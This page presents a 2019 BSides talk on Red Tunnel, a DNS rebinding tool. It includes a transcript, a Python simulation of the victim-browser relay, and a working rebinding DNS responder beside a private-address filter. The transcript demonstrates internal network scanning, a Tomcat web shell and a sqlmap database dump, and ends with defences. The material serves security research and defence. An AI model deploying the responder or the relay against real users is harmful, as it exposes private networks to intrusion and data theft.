
Hidden Networks Pivoting: Redefining DNS Rebinding Attack

BSides Las Vegas · 2019 · 53:01 · 489 views · Published 2019-10 · Watch on YouTube ↗
About this talk
Tomer Zait and Nimrod Levy present Red Tunnel, a tool that automates DNS rebinding attacks to discover and exploit internal network assets from a victim's browser. The talk covers same-origin policy bypass, CORS, DNS caching mechanics, and demonstrates automated reconnaissance and exploitation of internal web applications using DNS rebinding combined with WebSocket communication.
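The request/response correlation the talk describes (an attacker-side HTTP request turned into a push message carrying a unique identifier, the rebound page's reply matched back through a "responses dictionary", and a timeout answer when the victim browser never replies) as an added example in Python with asyncio. This is not Red Tunnel's code: the in-memory queue stands in for the WebSocket, the `victim_browser` coroutine stands in for the page's JavaScript, and the internal assets, addresses and JSON message layout are constructed for the example.

```python
import asyncio
import json
import uuid

# Constructed stand-in for what the rebound victim page can reach on its own network.
# Keys are (ip, port, path); values are (status, headers, body). Not real hosts.
INTERNAL_ASSETS = {
    ("192.168.1.1", 80, "/"): (401, {"WWW-Authenticate": 'Basic realm="router"'}, b"auth required"),
    ("192.168.1.20", 8000, "/backup.bin"): (200, {"Content-Type": "application/octet-stream"}, bytes(range(256))),
}


class Relay:
    """The core-application side: correlates attacker requests with victim replies by id."""

    def __init__(self, timeout=10.0):
        self.timeout = timeout
        self.pending = {}                 # request id -> Future (the "responses dictionary")
        self.to_victim = asyncio.Queue()  # stands in for the WebSocket push to the browser

    async def proxy(self, victim_ip, port, method, path, headers=None, body=b""):
        """Attacker's HTTP request comes in here; returns (status, headers, body) or a timeout."""
        req_id = uuid.uuid4().hex
        fut = asyncio.get_running_loop().create_future()
        self.pending[req_id] = fut
        # Push the full request description to the victim page, JSON-encoded like a WS frame.
        await self.to_victim.put(json.dumps({
            "id": req_id, "ip": victim_ip, "port": port, "method": method,
            "path": path, "headers": headers or {}, "body": body.hex(),
        }))
        try:
            return await asyncio.wait_for(fut, self.timeout)
        except asyncio.TimeoutError:
            return (504, {}, b"victim did not answer in time")
        finally:
            self.pending.pop(req_id, None)

    def on_victim_message(self, raw):
        """Victim pushed a reply: look up the id and resolve the waiting attacker request."""
        msg = json.loads(raw)
        fut = self.pending.get(msg["id"])
        if fut is not None and not fut.done():
            fut.set_result((msg["status"], msg["headers"], bytes.fromhex(msg["body"])))


async def victim_browser(relay, assets, stop):
    """Simulates the rebound page's JavaScript: receive push, fetch internal asset, push reply."""
    while not stop.is_set():
        try:
            raw = await asyncio.wait_for(relay.to_victim.get(), 0.05)
        except asyncio.TimeoutError:
            continue
        msg = json.loads(raw)
        key = (msg["ip"], msg["port"], msg["path"])
        if key in assets:
            status, headers, body = assets[key]
            relay.on_victim_message(json.dumps(
                {"id": msg["id"], "status": status, "headers": headers, "body": body.hex()}))
        # Unknown asset: the page never answers, so the relay's timeout fires instead.


async def run_demo():
    relay = Relay(timeout=0.3)
    stop = asyncio.Event()
    task = asyncio.create_task(victim_browser(relay, INTERNAL_ASSETS, stop))
    router = await relay.proxy("192.168.1.1", 80, "GET", "/")
    binary = await relay.proxy("192.168.1.20", 8000, "GET", "/backup.bin")
    missing = await relay.proxy("192.168.1.99", 80, "GET", "/")
    stop.set()
    await task
    return router, binary, missing


def demo():
    """Returns (router, binary, missing) tuples of (status, headers, body)."""
    return asyncio.run(run_demo())


if __name__ == "__main__":
    for name, result in zip(("router", "binary", "missing"), demo()):
        print(name, result[0], result[1], len(result[2]), "bytes")
```

The body is carried as hex so that binary responses (the directory-listing download in the demo) survive the JSON hop unchanged; the timeout path is what keeps one unresponsive victim from wedging the attacker's browser tab.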
Original YouTube description:
GF - Hidden Networks Pivoting: Redefining DNS Rebinding Attack - Tomer Zait & Nimrod Levy. Ground Floor, BSidesLV 2019 - Tuscany Hotel - Aug 07, 2019

Transcript [en]:

Hello, good morning. It's great to see a full room for day two, Ground Floor, at BSides' tenth conference in Las Vegas. A few announcements as usual before we begin: just a reminder, we are live-streaming; cell phones off; if you have questions, come to the microphone. And as always we'd like to thank our sponsors, especially our Inner Circle sponsors Critical Stack and [unclear], as well as Stellar sponsors BlackBerry, Microsoft and the Paranoids. The talk is on hidden networks pivoting; please welcome Tomer Zait and Nimrod Levy. Okay, thank you very much. Like I said, my name is Tomer Zait and this is Nimrod Levy. We'll show you the hidden

network pivoting using the redefined DNS rebinding attack. We call the tool Red Tunnel, but you will see all the concepts behind it. So, my name is Tomer Zait. I'm a security researcher at F5 Networks and I'm into CTFs; in my history you can see some CTFs. I'm also a CTF developer at BSidesTLV and also OWASP IL, and I was and I am an open source developer. That's it about me. Now, Nimrod. Hello everyone, my name is Nimrod Levy. I am the CTO and co-founder at Scorpiones. I'm here to talk to you about DNS rebinding automation and a tool that we developed called Red Tunnel. In my daily work I perform research on

various technologies, conduct operations, and give back to the community by developing open source tools. So how did this research begin? As a part of our community contribution, we are the developers of the BSidesTLV CTF, and last year we developed a challenge called "Can You Bypass the SOP". The challenge was based on a DNS rebinding vulnerability, of course, and the feedback from the challenge was that the exploitation process is complex. So Tomer and I thought and thought about how we can simplify this process, and built the Red Tunnel tool. Then we presented the tool at BSidesTLV and [unclear] last year, and we will present it again at the upcoming Black Hat USA, and of course here.

Before we talk about Red Tunnel we first need to understand some basic concepts. The first concept we'll discuss is the same-origin policy, followed by cross-origin resource sharing, and then some DNS caching basics. The same-origin policy is a browser-enforced restriction that prevents your domain from accessing resources that are not compatible with the same-origin policy checks. The same-origin policy checks include that your domain has the same scheme, hostname and port; if one of the checks fails, your request will be blocked by the same-origin policy. In this example you can see that evil.com is trying to access a file on evil.com. The request will be allowed because there is

no violation of the same-origin policy. But if evil.com tries to get a resource from good.com, the request will be blocked, because evil.com is not allowed to get access to good.com. But what if evil.com actually wants to get access to good.com? We can do that; in this case cross-origin resource sharing comes to the rescue. Cross-origin resource sharing is the mechanism that uses HTTP headers to tell the browser how to deal with outgoing requests to a different origin. In this example you can see that evil.com is trying to get access to good.com, and the request will be permitted because you can see that there

is a header called Access-Control-Allow-Origin that permits access to evil.com. In some situations the browser will trigger a preflight request before it tries to send the actual request. A preflight request is an HTTP request that is issued to a domain with HTTP headers under certain conditions, such as a special method: GET, POST, PUT, DELETE, PATCH, etc. The browser first sends an OPTIONS request to ensure whether evil.com can perform operations with good.com; if it can't, the request will be blocked, and if it can, the next request will be the actual request with all the other methods. In this example you can see that evil.com is

trying to access good.com with its own conditions; you can see that by the custom headers, etc. There are rules that you can read about on Google. But unfortunately the request will be blocked because good.com does not permit access to evil.com, and for that the request will be rejected by the browser and it will not send the actual request. Now let's talk a little bit about DNS and the DNS cache. Please take a look at the following DNS response. You can see the hostname translation: the hostname resolves to the localhost address. You can also see that the time to live is 152 seconds; it means that the local DNS

cache will store the record for 152 seconds. Now let's see how it looks on a Windows machine. First of all we will ping our server, which will trigger a DNS request. The DNS response will be translated to the localhost address. Then we will update the record to the 1.3.3.7 IP with our DNS server; it will be used with Cloudflare for this example. But you can see that there are still 24 seconds left before the cache expires.

Okay, okay, when the cache expires... [unclear] we wait for the command. Okay, when the cache expires you can see that the local DNS cache is empty. Now we will send a new DNS request by sending a ping; this in turn will trigger, of course, a new DNS request, and the DNS response will resolve the new IP and map the hostname to the 127 IP. Now let's see how it works. The victim computer sends a request to evil.com, which goes to our DNS; the DNS server will resolve our malicious server IP. Next the browser will issue a GET request to the resolved server IP and execute the following malicious JavaScript code. The JavaScript

code will halt itself until the evil.com HTML title is changed. When the title changes, I can know that the rebinding process was successful. When the script calls itself, our DNS server will change the IP assignment to another internal IP, and once the local DNS cache is renewed and populated with the new IP, I can have access to the resource, send requests to the host, and compromise internal assets.

So let's talk about the era before Red Tunnel: what happened with DNS rebinding, because it's a ten-year-old attack that still exists in the wild. So before Red Tunnel, we'll see what happened with the DNS rebinding tools. For the old DNS rebinding tools to work, you needed to gain information about the victim. You can't attack using DNS rebinding without knowing the IP addresses that you are going to attack. You needed to use different scripts to scan the network, to find the hosts and to understand that the ports you found in the scanning process are HTTP ports, because if they're not, you cannot attack using DNS

rebinding. And then after you have all this information you needed to create scripts in advance to attack those internal assets. You needed to use scripts that attack the router or the internal application, but they would only be used to attack one application at a time; you cannot create something that will be granular and will work on every application in the world. So let's talk about the disadvantages of this process. You need information about the user, about the internal assets, and this information is really hard to get. You really need to find a way to get the internal IP addresses, to find what applications they have, because if you don't know the applications you are

going to attack, you cannot use those automatic scripts to do the attack for you. And now, it's hard to configure: those tools are really hard to configure if they have a configuration; not all these tools have a configuration, and if they have one, sometimes it's a code configuration, so you need to understand how to code in order to configure the application. The scanners are mostly slow because they use only timeout attacks to find the internal assets, to understand if an IP exists or not, and never know if the port is open and the port is an HTTP port before they start the rebinding process. There is no victim management for most

of those, so if there is no victim management you will forget some of the victims and you will not be able to gain information from those victims and execute attacks like SQL injection on the internal applications. Let's not say SQL injection, because with the old tools you cannot use SQL injection on an application that you don't know, an internal application that someone just developed on his local machine; you cannot attack this application using SQL injection. So the payloads are limited: it's just for known tools, for known assets, for known applications. So they are really limited to scripts that the community created, and you cannot attack manually if you want to just see

the application with your own eyes and understand, okay, there's a basic authentication mechanism, maybe I will use this basic authentication, I will brute-force this basic authentication mechanism, I will find the username and password and just get access to the application, even if it's Tomcat. It's really hard to create those scripts manually using JavaScript and then use the DNS rebinding tools, and you can't use automatic tools like sqlmap. But we want to use sqlmap to gain access to the database and then dump all the tables and get information about the users and passwords and everything in the database. So we can't do it

in the old tools. So this is the thing that Red Tunnel gives you: it will give you the option to use all those features that you could not use in the old tools, in a new manner. So let's see how it works. This is the automatic process of Red Tunnel. We get the internal IP address. For now it won't work on Chrome version 75 and up, because they fixed it; now you cannot get the internal IP address using WebRTC. But we are still using other techniques; we'll add them in the next version, that will fuzz between IP addresses that we know could be in the internal network, to understand if this network exists, that there's an IP

address like 192.168.1.1, and if this IP address exists that means that we can scan this network through the 255 IP addresses and then find the internal assets, find the ports and exploit the applications. So we will scan for the internal hosts, then after we found the internal hosts we'll try to scan for open HTTP ports. We use our own JavaScript reconnaissance scripts: some of them use timeouts, some of them use events on DOM elements, but they're all very accurate; we checked it a lot before we published the code on GitHub, of course. And it will bypass browser limitations. So in your browser you cannot use a script that will

just show you that there's basic authentication behind the asset. When you send a request to a web page, you either send the credentials in advance or you just send the credentials in the URL, but in the newer versions of the browsers you cannot use the old mechanism of sending the username and password inside the URL; only one function allows it, and it's the regular Ajax request. So we use it to send an Ajax request with bad credentials, and then we know that there's basic authentication behind the scenes that showed us that those credentials are wrong, but next time you will be able to insert the right credentials. So we automate the

whole... It will automate the whole DNS rebinding process inside the Red Tunnel script. It will tunnel through victims to the internal network; that means that you can actually surf the internal network assets like the router. You just click on the link and you see the router like it was in the DMZ. It's not, but we have our own scripts and our own features that allow us to just surf the web in the internal network like it was in the DMZ. Then you will be able to manage everything, all the attacks and all the victims, in one single page with all their assets. So let's talk about Red Tunnel and see how it works. So this is

the architecture of Red Tunnel. You can see we have the core application. The core application is the malicious web application; it's also the command and control center where the attacker can see all the assets of the victims, but it also attacks the client. So the client opens a web application, just opens a link; in our demo you will see it will be solitaire again, because a game takes longer, and as long as people are on a specific web page you will be able to gain more information and to attack more assets. Okay, so they click on a link, they just forget about it. The link is then translated to the core application; the

core application understands that the DNS rebinding process should be started, and it will talk to the DNS to change the IP address, like you saw in Nimrod's demo. So then after the DNS address changed, you will get back to the core application, and the attacker will be able to use the core application to get access to the internal assets. So how do we really create a proxy for the user that surfs the web from the victim browser? That's what I will talk about now. So we have a client JavaScript proxy, but how does it work? You cannot just send requests to the victim browser; you just can't. Even if you know the IP address, the victim

browser is still the victim browser. It can send requests directly from the victim browser to the internal assets, but what you can do from the attacker is use a malicious app in the middle that will translate the web page to the attacker from the victim browser, and this is one of the best features we have in Red Tunnel. It will also allow you to send requests like POST, PUT, DELETE, PATCH and every other request that you could not do in the old tools. So now I will talk about how it works. You will see everything in the code; like I said, it's all open source. So, to be able to gain information and access

to the internal web applications, first the victim needs to click on the link. On this link there is a malicious web application, and the malicious web application just creates, using JavaScript, a WebSocket connection with the malicious web application (it's still the same web application, with WebSocket and also with HTTP). Now the attacker sends requests to the malicious web application with the internal web application information; here you can see the IP address. But you can still say it's the same domain, it's still evil.com, but the subdomain will have information about the victim, like the victim ID and the victim IP address and the victim

port, because one victim will have many IP addresses, because there's a full internal network behind it, and also there are lots of ports, because on one host you will have many ports and maybe some of them are HTTP ports. So you need this information in order to get the right response from the right web application. I did not write it here, but to talk with many assets in the same web application we created iframes; it's really hard to get the information from as many web applications as we can and to do it asynchronously, so we have iframes and we connect to those iframes with web messaging. So now we have the mechanism of how we can send

requests. But let's see the real request. So we send a request to the malicious web application, but how can we get the information we need from the internal web application in the victim browser's network, from the malicious web application? So the malicious web application has a responses dictionary and it will save the response object. We're using Node.js; it is possible to create a global response object that will have key-value pairs of responses, and also we can just create a timeout mechanism to set a timeout. When the response has timed out, if we waited for ten seconds and the response never came, we can just set a timeout mechanism

that will respond with a timeout. So now the malicious web application will send a push message to the WebSocket in the victim browser with a unique identifier and all the request information. Here I just showed you the URI and the method, but you will also see data and other good information, like we will see the credentials for basic authentication, and you will also see the headers, and customized headers that we want to send in the request from the browser to the internal assets that are already rebound using Red Tunnel and the DNS rebinding. Now, after the victim browser responds with another push message using WebSocket to the malicious web application, you

will see the same identifier, but now you will see the headers of the response and also the data, the body of the response that will come back to the user. And now the attacker and the malicious web application find the right response and just respond using the send function, returning the response with all the headers, even the basic authentication headers, and with all the information and all the body of the response to the attacker, even if it's binary files; the attacker will still be able to download those binary files using the same technique. So as I said, you can find the Red Tunnel source code here on GitHub, github slash Red Tunnel. And now I

will talk about the easy part: why is it so easy? It seems so hard to set up all these things, like you need a DNS server and you need the core application and you need the database and you need everything. It's not that hard; you can just use Docker, docker-compose up -d, because we want it to run as a daemon, and then you will have the DNS server, the core application and also the database on the same server. Then you need to register a domain. So you need a domain; we chose Freenom because Freenom has free domains. And now when you have the domain you can

just insert the name server. So the name server is actually the web application that you have, but you say, okay, I don't have a subdomain called ns.redtunnel.[unclear] or whatever domain you have. Yes, you don't have it, but for that you can use glue records. With glue records you will have something like an internal hosts file: you create an IP that will be translated to the subdomain, so it will not go to the DNS server at all; it will just be translated immediately. That way you will be able to create the name servers and then you will be able to

use them. So now you just need to set your admin credentials and you're good to go. So now I will show the demo. I hope that the demo is longer; I think I did it a little bit fast. So I will show the demo, then you ask your questions. I will try to pray to the demo gods because it's a live demo, and the last time I prayed it didn't work, so maybe now after I sacrifice Nimrod... So let's see. This is the internal... This is Red Tunnel, this is the web application. Okay, so this is Red Tunnel. You can see Red Tunnel here, and you can see that

somebody tried to connect. I don't know why; it's not a good idea, people. If you don't want your internal network to be ours, don't do it. Good choice. So now I will connect to the RDP again, because it's all messy. Okay, so this is the remote desktop, and we'll open the Red Tunnel link. It's just a solitaire game; you can see it's a regular solitaire game. I hope the internet works; if not I will use my phone for that. Let's see, yes, I'm connected.

Just in advance, try to use this. I also have a recorded demo because I don't trust the demo gods, but I want to show it in real time.

So let's use the phone instead. Okay, it works. Here is the solitaire, and now it started the whole Red Tunnel process. So now it scans for the hosts; you can see it out here, one second, it's a little bit bigger than it was when I tried this demo. Okay, so you can see it scanning the network. There's an iframe and you'll see, oh, it's already started. Refresh now... it just stopped. I'll open the iframes so we can see all the requests going; here it's being polled, here are the requests, you can see the requests going. So now it's scanning for ports. I will tell you why I chose solitaire, it's a really funny story. I thought about using Pac-Man or Mario, but then I

thought, but I can lose, and I'm a gamer and it won't look good if I lose in Mario. So I chose a game where I don't need to do anything in order to play; I just let it stay that way and that's it. And now it's scanning for the hosts; we'll see when it's finished, in a few seconds. Here are the hosts. Now you see the basic authentication popped up; this is a mechanism that we created in order to get responses from basic authentication hosts. If there is a host with a port that has behind it a web application with basic authentication, we still need to gain the information that it is a web application

with basic authentication, so we have some ways in order to get this knowledge. So we found all the hosts and now we search for the ports, and it considers ports on the localhost and ports on other assets, like 8080 on another IP address inside the network, and 80 on another asset, and again 80 on another asset. And now we'll see what the attacker sees when all this information gets to the attacker. So see, I was just very... refresh, because the internet wasn't that good.

Okay, now the DNS rebinding process finished, so we can just see everything in the attacker web page, the command and control. I will do it for another minute, and if it won't work I will just show the video that we created before the conference.

[Music] Oh, sure. So here's the attacker perspective. Here we have lots of information that we got from the user: we have the assets that we rebound and... of course the internet just disconnected us, so I'll try to do it before it disconnects us once more. So now what we can do is we can just go to those assets, explore those assets and see the web applications behind them. So here we can see that inside, the victim had an internal web application, a simple HTTP server with Python, and in this SimpleHTTPServer he had a directory listing. So now we can just download binary files from the

internal web application just by clicking on a link. That's it, we just see the web application, you can see those binary files. And now I see that it's really, really, really slow, so I will just go to the recorded demo. I'm sorry, because I don't want you to wait for the internet; it's like you want to pee and just need to hold it. Oh cool, the demo gods really don't like me. I will just reopen the presentation.

Okay, let's go, demo. Screw you once again, demo gods, haha. Okay, so now you'll see the same thing but with a recorded demo. I'm sorry, it's too slow and I can't handle it; my heart is really pumping right now. So here is the demo, and we just scan for the hosts and for the ports in the assets of the victim. So the victim opened a solitaire game and now we're just creating filters for the logs of Red Tunnel, because Red Tunnel is in debug mode, and it will almost always be in debug mode because it's still in the development stage; it's still beta, alpha or whatever. It's an open source application, who cares.

So now we'll get the hosts, the internal hosts in the internal network, as you can see, and after that you will see the internal ports; it will scan for the internal ports. This is a short process because we already have all the hosts and we have configured ports, and now it will rebind to every port you can see in the internal ports that it found. So it will start the rebinding process right now and we should see the whole new host that was created with a random string for every internal host and port and victim. You should see it right now; I'll just fast-forward.

Okay, you can see it right there. Maybe you missed it: here are all the rebound internal hosts and ports, and now we just have the command and control center. It's the same application that was used in order to get the attack started, and as you can see we just clicked on the binary file and we saw the response. Here we will see another web application inside the network. I just want to show you before I finish the presentation: you can see here that every subdomain has information about the user, so you can automate using your tools. You just need the cookie, the Red Tunnel cookie, because we are still

security people, so we don't want anybody to gain access to the internal web applications of another victim; we just want it to be ours. So there's a security cookie. This is the IP address; you will use the IP address in every Red Tunnel link. This is the port, and this is the ID, the unique identifier that every user has in local storage. So now we will see that we can actually use basic authentication like the application was on the internet, in the DMZ. So we can just use Tomcat: find Tomcat in the internal network, now use Tomcat... okay, sorry, just insert the credentials to Tomcat using basic authentication in our own

attacker web browser, and we have control over the management of Tomcat. But it's not enough: we can just use other techniques, like using an old exploit that uses the PUT method in order to create new pages in Tomcat, and we will just have a web shell. So this is another demo of what we can do using just Red Tunnel and everything. Okay, so we use the shell, and now you will see that we can also use Red Tunnel with automatic tools like sqlmap. So we'll see the DVWA application; it's a vulnerable web application with lots of vulnerabilities. We'll check the SQL injection vulnerability here in DVWA: we'll just set user ID 1, we'll take the response, because we

still need the cookie, the Red Tunnel cookie, on the server side. [Music]

You can see the whole response here with the cookie. We'll open CMD, or here it's PowerShell; although I had PowerShell, it was still the faster option. Now we just execute the sqlmap command with the request file, and it will find that we have a MySQL database here; of course we'll tell it yes, it's MySQL, don't try another database. And now it will find the attack vector, generic UNION; still, yes, don't waste your time, we know the attack vector. And you should see right now that it started the SQL injection attack, and it knows that the id parameter is vulnerable, and now it found the right amount of columns

and it found a users table, and if we click one more time you can see the whole database dumped in front of our eyes. So you can use automatic tools on the internal assets of someone just using Red Tunnel. It never existed in the wild, not officially of course; I think we are not the first ones to create such tools, but it's so simple that anybody could use the DNS rebinding attack everywhere without knowing anything about the victim. And so I want to thank Max Rank for the logo, for the stickers, so thanks to Max, and also Dima Bielski for the UI. This is the only way that the UI would

look like a UI and not like a drawing of a ten-year-old boy if I created the UI. So thanks Dima, and now we have time for questions. Anyone? Q: How do you pick the subnets to scan, and could you make that threaded so it scans a little faster? It looks like about one second per IP, so is it multi-threaded? A: Yes, it's multi-threaded. I cannot use more than eight threads in Chrome; the problem is that Chrome has a limitation of threads, it has its own queue, and this queue will expire some of the requests if they're not executed in the right time. So we used a library we created called JS

Pool, like in Python: you have a pool of threads, you tell it how many threads you want. So here we use 10 threads; maybe in Firefox we can use more threads, but it still doesn't work on Firefox. And we just create requests, and it's with promises, so we know when the request executed and returned, so we can populate with another request and another, so it's really fast. It's not faster than a regular scan, because there you don't have this queue that Chrome has and you don't have this problem. And we tried to bypass this problem using web workers and iframes and stuff; it didn't work. So it's still using this library we created called JS Pool; you can

just check it out, it's in the same project, and it's still really fast. It's something like one minute; the whole DNS rebinding process for an entire internal network is between one to two minutes. It's the fastest you will get on the internet, believe me; I tried so many tools. Q: Okay, this was difficult to see from the back. Were any of the services you exploited on the internal network SSL-enabled? A: No, no, of course. It's one of the ways you can protect from DNS rebinding exploitation. So if you want to protect against DNS rebinding, use SSL. If you don't have a port that has SSL termination or something like that, you can just check that this port will not

verify, like Selenium does it by default for most of the web browsers, because they don't want to check the SSL, because you know, when you create an internal web application the SSL is just a custom-built, self-signed SSL certificate. So you can just send requests to those web applications and you will not see the errors that Chrome shows when it checks the SSL and it fails. But with other types of clients, like the regular clients, real people, you will not be able to send requests to the internal assets that use SSL, because when you change the hostname, even this change will make the SSL fail, and then you

will not be able to get a response. So this is one of the protection mechanisms you can use. You can also create one host for every web application, and if you use another host it will just... Thank you, very cool. Q: Okay, another question, thank you very much. I had a question from the defense side. On the whole system, would you see this as Chrome doing all these things, or would you see like sqlmap spawning up, or nmap or other tools that you would use? A: Yeah, you will see Chrome; if sqlmap is used, sqlmap... no, you will see Chrome. You cannot change the user agent from

JavaScript, so you just see Chrome. Q: So you just see Chrome doing all this? A: Yeah. Q: And you'd probably see later on it creating video connections and stuff like that? A: Yes. Okay, [unclear].

Q: So just for clarification, I see you've got the internal DNS server running within your malware, but wouldn't a DNS server just be able to filter a request that comes back from an RFC 1918 address? Wouldn't that be a way to stop the rebind attack, or is that something you did with your internal DNS server? A: Yes, you're right, you can just filter those requests. There are a few ways to bypass it, like ordering the priority of the requests, so one DNS address will get a lower priority than the other, and then it will just mingle between those requests. But still, I don't think it's a good idea, because

you have internal assets and those internal assets have internal IP addresses, so I don't think you can really use this mechanism to protect against the DNS rebinding attack when you have internal web applications inside your network; they will use the same IP addresses, so it's not really a good idea to do it, unless you have a customized DNS server and you can just customize the internal web applications to have the same DNS but with subdomains of the same DNS; it will be much easier to protect. Another question? Okay, so thank you. [Applause]
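The attacker-side DNS mechanics from the talk (an authoritative responder that first answers with the attacker host so the page loads, then answers the same name with an internal address so the same-origin policy now covers the internal asset) together with the resolver-side defence raised in the last question (dropping answers that point into RFC 1918 space, as dnsmasq's --stop-dns-rebind option does), as an added example in Python that is not Red Tunnel's code. The hostname and addresses are constructed for the example, and the switch is triggered by "second query from the same client" here; in the talk the core application tells the DNS server when to switch. Packets are built and parsed by hand so the block runs offline with no DNS library.

```python
import ipaddress
import struct
from dataclasses import dataclass, field

# Hypothetical names and addresses for this example only.
HOSTNAME = "evil.example"       # stands in for the talk's evil.com
ATTACKER_IP = "203.0.113.10"    # documentation range, stands in for the public attacker host
INTERNAL_IP = "192.168.1.1"     # the internal asset (router) the attacker wants the browser to reach


def _parse_qname(packet, offset):
    """Read an uncompressed DNS name starting at offset; return (name, offset after it)."""
    labels = []
    while True:
        length = packet[offset]
        offset += 1
        if length == 0:
            break
        labels.append(packet[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def _encode_qname(name):
    out = b""
    for label in name.split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, txid=0x1337):
    """Minimal DNS A query, as the victim's resolver would send it (RD set, one question)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + _encode_qname(name) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


@dataclass
class RebindingResolver:
    """Authoritative responder for HOSTNAME: attacker IP on first sight of a client, internal IP after."""
    attacker_ip: str = ATTACKER_IP
    internal_ip: str = INTERNAL_IP
    ttl: int = 0                              # TTL 0 so the victim's cache re-asks immediately
    seen: set = field(default_factory=set)

    def answer_ip(self, client_key):
        if client_key in self.seen:
            return self.internal_ip
        self.seen.add(client_key)
        return self.attacker_ip

    def respond(self, query, client_key):
        txid, _flags, qdcount = struct.unpack("!HHH", query[:6])
        name, end = _parse_qname(query, 12)
        qtype, _qclass = struct.unpack("!HH", query[end:end + 4])
        question = query[12:end + 4]
        if name.lower() != HOSTNAME or qtype != 1:
            # NXDOMAIN (QR, RD, RA, RCODE=3) for anything we are not authoritative for
            return struct.pack("!HHHHHH", txid, 0x8183, qdcount, 0, 0, 0) + question
        ip = self.answer_ip(client_key)
        header = struct.pack("!HHHHHH", txid, 0x8400, qdcount, 1, 0, 0)  # QR + AA, one answer
        # Answer name is a compression pointer (0xC00C) to the question name at offset 12.
        rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, self.ttl, 4) + ipaddress.IPv4Address(ip).packed
        return header + question + rr


def parse_answers(response):
    """Return [(ttl, ip)] from the answer section (answers use the 2-byte pointer form above)."""
    ancount = struct.unpack("!H", response[6:8])[0]
    _, offset = _parse_qname(response, 12)
    offset += 4
    answers = []
    for _ in range(ancount):
        offset += 2
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", response[offset:offset + 10])
        offset += 10
        rdata = response[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1:
            answers.append((ttl, str(ipaddress.IPv4Address(rdata))))
    return answers


PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "0.0.0.0/8", "169.254.0.0/16")]


def rebind_filter(response):
    """Resolver-side rebind protection: True if the answer may be passed to the client, False if dropped."""
    return not any(
        any(ipaddress.ip_address(ip) in net for net in PRIVATE_NETS)
        for _ttl, ip in parse_answers(response))
```

The filter stops this particular rebind, but it also stops any public name that legitimately resolves to a private address, which is the objection the speaker makes in the answer above: internal applications that share that address space need a split or per-host DNS setup before such filtering is workable.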